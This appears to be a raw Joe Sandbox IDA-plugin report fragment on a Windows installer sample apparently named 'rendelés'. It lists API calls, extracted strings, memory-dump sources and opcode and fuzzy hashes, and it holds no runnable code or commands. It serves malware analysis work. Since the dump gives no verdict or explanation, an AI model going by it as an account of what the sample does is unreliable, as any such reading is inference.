                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54ef87b312a0e044a60b3793a2eded1920c8859fea334ebc22b5ab11ccfbe548
                                                                • Instruction ID: 7800a2ad92aea8c5ed3c2dfe7580b4299a725c5b7d846955c10f715998bf18c2
                                                                • Opcode Fuzzy Hash: 54ef87b312a0e044a60b3793a2eded1920c8859fea334ebc22b5ab11ccfbe548
                                                                • Instruction Fuzzy Hash: AFD0A730A19B148BD331D659E104653B7DAFB88710F90486DF49B87E80CBA5FC418BC0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
                                                                • Instruction ID: a803438837bcc0ab2d6aca8461d8fe1e0aa16c3bc306f6769137f0516b4ff682
                                                                • Opcode Fuzzy Hash: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
                                                                • Instruction Fuzzy Hash: A1C0123A3080908F8A06A728E0644B837B2DBCA22932400AAE148CB362CE229802CB00
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00008001), ref: 00403663
                                                                • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004037E9
                                                                • GetTempPathW.KERNEL32(00000400,00437800,00000000,?), ref: 0040391C
                                                                • GetWindowsDirectoryW.KERNEL32(00437800,000003FB), ref: 0040392D
                                                                • lstrcatW.KERNEL32(00437800,\Temp), ref: 00403939
                                                                • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp), ref: 0040394D
                                                                • lstrcatW.KERNEL32(00437800,Low), ref: 00403955
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low), ref: 00403966
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00437800), ref: 0040396E
                                                                • DeleteFileW.KERNEL32(00437000), ref: 00403982
                                                                • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,?), ref: 00403A69
                                                                • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,?), ref: 00403A78
                                                                  • Part of subcall function 00405C16: CreateDirectoryW.KERNEL32(?,00000000,00403633,00437800,00437800,00437800,00437800,00437800,00403923), ref: 00405C1C
                                                                • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403A83
                                                                • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403A8F
                                                                • SetCurrentDirectoryW.KERNEL32(00437800,00437800), ref: 00403AAF
                                                                • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                • CopyFileW.KERNEL32(00438800,00420F08,00000001), ref: 00403B21
                                                                • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                • OleUninitialize.OLE32(?), ref: 00403B71
                                                                • ExitProcess.KERNEL32 ref: 00403B8B
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                • ExitProcess.KERNEL32 ref: 00403C1F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3859024572-334447862
                                                                • Opcode ID: deb3a00d143b6aa78bb2b1a2e346eb90566b5d977a12c27eefb7c9e462199e19
                                                                • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                • Opcode Fuzzy Hash: deb3a00d143b6aa78bb2b1a2e346eb90566b5d977a12c27eefb7c9e462199e19
                                                                • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,75923420,75922EE0,00000000), ref: 00405D9D
                                                                • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,75923420,75922EE0,00000000), ref: 00405DE5
                                                                • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E08
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E0E
                                                                • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E1E
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: .$.$PWB$\*.*
                                                                • API String ID: 2035342205-2468439962
                                                                • Opcode ID: 940861fcee61791cebd47972434d631a122b2fd3f1b0f9519d925d107bfe0621
                                                                • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                • Opcode Fuzzy Hash: 940861fcee61791cebd47972434d631a122b2fd3f1b0f9519d925d107bfe0621
                                                                • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PD-5$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-2932928583
                                                                • Opcode ID: 41676061bdbea65a8194dae48a9ff8af271ffbed5aca85fc0ac8e3c1c7644b9c
                                                                • Instruction ID: 254701f644aafa3230cbe81ae47f155bbf379ba7e4bb85f41878cb22cb77c9bb
                                                                • Opcode Fuzzy Hash: 41676061bdbea65a8194dae48a9ff8af271ffbed5aca85fc0ac8e3c1c7644b9c
                                                                • Instruction Fuzzy Hash: 0D125E30A002198FDB14DF69C994A9DB7F3BF88344F2085A9D40AAB355EB75DD82CF80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                • GetClientRect.USER32(?,?), ref: 004058B3
                                                                • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                • ShowWindow.USER32(00000000), ref: 00405A02
                                                                • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                • ShowWindow.USER32(00000008), ref: 00405A51
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                • CreatePopupMenu.USER32 ref: 00405A96
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                • EmptyClipboard.USER32 ref: 00405B31
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                • CloseClipboard.USER32 ref: 00405B8C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: H7B${
                                                                • API String ID: 590372296-2256286769
                                                                • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                • ShowWindow.USER32(00000000), ref: 00405627
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 2564846305-813528018
                                                                • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                • ShowWindow.USER32(?), ref: 00404121
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                • DestroyWindow.USER32 ref: 00404160
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                • GetDlgItem.USER32(?,?), ref: 00404198
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                • EnableWindow.USER32(?,?), ref: 004043AC
                                                                • EnableWindow.USER32(?,?), ref: 004043C7
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                • String ID: H7B
                                                                • API String ID: 1860320154-2300413410
                                                                • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                APIs
                                                                  • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                  • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                • lstrcatW.KERNEL32(00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420,00437800,?,00000000,?), ref: 00403D98
                                                                • lstrlenW.KERNEL32(00428200,?,?,?,00428200,00000000,00435800,00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420), ref: 00403E18
                                                                • lstrcmpiW.KERNEL32(004281F8,.exe,00428200,?,?,?,00428200,00000000,00435800,00437000,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                • GetFileAttributesW.KERNEL32(00428200,?,00000000,?), ref: 00403E36
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403E7F
                                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                • API String ID: 1975747703-3472120104
                                                                • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                • GetSysColor.USER32(?), ref: 00404863
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                • lstrlenW.KERNEL32(?), ref: 00404884
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                • SendMessageW.USER32(00000000), ref: 00404906
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                • SetCursor.USER32(00000000), ref: 00404985
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                • SetCursor.USER32(00000000), ref: 004049A1
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: N
                                                                • API String ID: 3103080414-1130791706
                                                                • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                • wsprintfA.USER32 ref: 0040632D
                                                                • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,00438800,80000000,00000003), ref: 0040615C
                                                                  • Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
